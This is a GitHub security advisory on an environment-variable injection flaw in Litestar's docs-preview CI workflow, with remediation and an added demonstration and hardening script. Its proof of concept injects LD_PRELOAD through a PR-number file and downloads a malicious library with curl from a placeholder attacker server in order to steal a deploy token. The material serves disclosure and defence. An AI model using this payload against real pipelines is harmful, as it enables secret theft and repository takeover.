
Environment Variable injection in `docs-preview.yml` workflow

High
JacobCoffee published GHSA-4hq2-rpgc-r8r7 Aug 9, 2024

Package

actions dawidd6/action-download-artifact (GitHub Actions)

Affected versions

<=6

Patched versions

<=6

Description

Summary

Litestar's docs-preview.yml workflow is vulnerable to Environment Variable injection which may lead to secret exfiltration and repository manipulation.

Environment Variable injection (GHSL-2024-177)

The docs-preview.yml workflow gets triggered when the Tests And Linting workflow completes:

on:
  workflow_run:
    workflows: [Tests And Linting]
    types: [completed]

Later, it downloads and extracts an artifact generated by the triggering workflow:

- name: Download artifact
  uses: dawidd6/action-download-artifact@v6
  with:
    workflow_conclusion: success
    run_id: ${{ github.event.workflow_run.id }}
    path: docs-preview
    name: docs-preview

And reads docs-preview/.pr_number into an Environment Variable:

- name: Set PR number
  run: echo "PR_NUMBER=$(cat docs-preview/.pr_number)" >> $GITHUB_ENV

The file that $GITHUB_ENV points to is just a regular file: after the step completes, every KEY=VALUE line in it defines a new Environment Variable. Because the contents of .pr_number are never validated, the file may contain newlines, and every extra line becomes an additional KEY=VALUE entry, i.e. an attacker-chosen Environment Variable.

An attacker can send a malicious .pr_number file with the following content:

111
LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

Which will result in two Environment Variables being defined:

  • PR_NUMBER=111
  • LD_PRELOAD=/home/runner/work/litestar/litestar/inject.so

In this example the injected LD_PRELOAD variable instructs the dynamic loader to load a malicious shared library, inject.so, into every dynamically linked process started in the job's subsequent steps. The library is shipped inside the same attacker-controlled artifact, so the path it points at exists on the runner by the time the variable takes effect.

The next step runs the JamesIves/github-pages-deploy-action action, which executes the node command. With LD_PRELOAD set, inject.so is loaded into that node process and its code runs with the step's inputs, including the DOCS_PREVIEW_DEPLOY_TOKEN secret passed as token:

- name: Deploy docs preview
  uses: JamesIves/github-pages-deploy-action@v4
  with:
    folder: docs-preview/docs/_build/html
    token: ${{ secrets.DOCS_PREVIEW_DEPLOY_TOKEN }}
    repository-name: litestar-org/litestar-docs-preview
    clean: false
    target-folder: ${{ env.PR_NUMBER }}
    branch: gh-pages

PoC

  • Clone the repository
  • Edit the ci.yml workflow.
name: Tests And Linting

on:
  pull_request:

jobs:
  upload-patch:
    runs-on: ubuntu-latest
    timeout-minutes: 10
    steps:
      - name: Save PR number and payload
        run: |
          make payload
          echo -e "${{ github.event.number }}\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so" > payload/.pr_number
          curl http://<ATTACKER SERVER>/inject.so -o payload/inject.so

      - name: Upload artifact
        uses: actions/upload-artifact@v3
        with:
          name: docs-preview
          path: payload
  • Create a Pull Request with this change.
  • Since the modified workflow is triggered on pull_request, the attacker's Pull Request runs it from the fork, and on completion the workflow_run trigger starts the vulnerable Deploy documentation preview workflow (docs-preview.yml), which reads the malicious artifact and pollutes the Environment Variables of its own job.

Impact

This issue will grant a malicious actor the following permissions:

  • Issues: write
  • Metadata: read
  • PullRequests: write

In addition, the following secret will get exposed to the attacker: DOCS_PREVIEW_DEPLOY_TOKEN

Remediation

  • Verify the contents of downloaded artifacts before using them; an artifact produced by a workflow_run trigger comes from the triggering workflow, which a fork controls.
  • Do not allow newlines (or anything other than the expected decimal digits) in the value written to GITHUB_ENV.
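The script below is an added example, not code from the advisory or the Litestar project. It models how the runner consumes the $GITHUB_ENV file, reproduces the newline injection described above with a constructed .pr_number file, and shows the hardened writer the remediation calls for. Function names, the scratch directory layout and the benign "4321" sample are mine; the malicious file content is the one from the advisory.

```shell
#!/usr/bin/env bash
# Added example (not the advisory's or Litestar's code): how $GITHUB_ENV
# parsing turns an unvalidated artifact into extra variables, and a writer
# that only accepts a plain PR number.

# Constructed stand-in for the attacker-controlled artifact directory.
# The content mirrors the advisory's malicious .pr_number.
make_malicious_artifact() {
  mkdir -p "$1"
  printf '111\nLD_PRELOAD=/home/runner/work/litestar/litestar/inject.so\n' \
    > "$1/.pr_number"
}

# Constructed benign artifact: a PR number and nothing else.
make_benign_artifact() {
  mkdir -p "$1"
  printf '4321\n' > "$1/.pr_number"
}

# Simplified model of the runner: after the step, every KEY=VALUE line in
# the file becomes an environment variable. Prints the names that would be
# defined, each followed by a space.
names_defined_by_github_env() {
  sed -n 's/^\([A-Za-z_][A-Za-z0-9_]*\)=.*/\1/p' "$1" | tr '\n' ' '
}

# Vulnerable pattern from the workflow: artifact content pasted into
# GITHUB_ENV without validation. $(cat ...) keeps interior newlines.
write_pr_number_unvalidated() {
  local artifact="$1" github_env="$2"
  echo "PR_NUMBER=$(cat "$artifact/.pr_number")" >> "$github_env"
}

# Hardened pattern: allow-list a short run of decimal digits and nothing
# else. A newline, an '=', or any other byte fails the check, so a second
# KEY=VALUE line can never reach the file. Plain POSIX sh constructs, so it
# behaves the same under any `shell:` the job uses.
write_pr_number_validated() {
  local artifact="$1" github_env="$2" value
  # Bound the read so an oversized artifact file cannot stall the step.
  value="$(head -c 64 "$artifact/.pr_number")"
  case "$value" in
    '' | *[!0-9]* )
      echo "refusing to set PR_NUMBER: .pr_number is not a decimal PR number" >&2
      return 1 ;;
  esac
  if [ "${#value}" -gt 9 ]; then
    echo "refusing to set PR_NUMBER: value too long" >&2
    return 1
  fi
  echo "PR_NUMBER=$value" >> "$github_env"
}

# Stand-alone demo in a scratch directory.
demo() {
  local tmp
  tmp="$(mktemp -d)"
  make_malicious_artifact "$tmp/evil"
  : > "$tmp/github_env"
  write_pr_number_unvalidated "$tmp/evil" "$tmp/github_env"
  echo "unvalidated writer defines: $(names_defined_by_github_env "$tmp/github_env")"
  : > "$tmp/github_env_safe"
  if write_pr_number_validated "$tmp/evil" "$tmp/github_env_safe"; then
    echo "unexpected: malicious artifact accepted"
  else
    echo "validated writer rejected the artifact; nothing written"
  fi
  rm -rf "$tmp"
}
demo
```

In the workflow, the body of write_pr_number_validated would replace the one-line `run:` of the "Set PR number" step; a failed check fails the step, which stops the deploy step from ever running with attacker-controlled variables. Note also that $GITHUB_ENV should be quoted ("$GITHUB_ENV") in the redirect.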

Disclosure Policy

This report is subject to a 90-day disclosure deadline, as described in more detail in our coordinated disclosure policy.

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
8.8 / 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE ID

CVE-2024-42370

Weaknesses

No CWEs
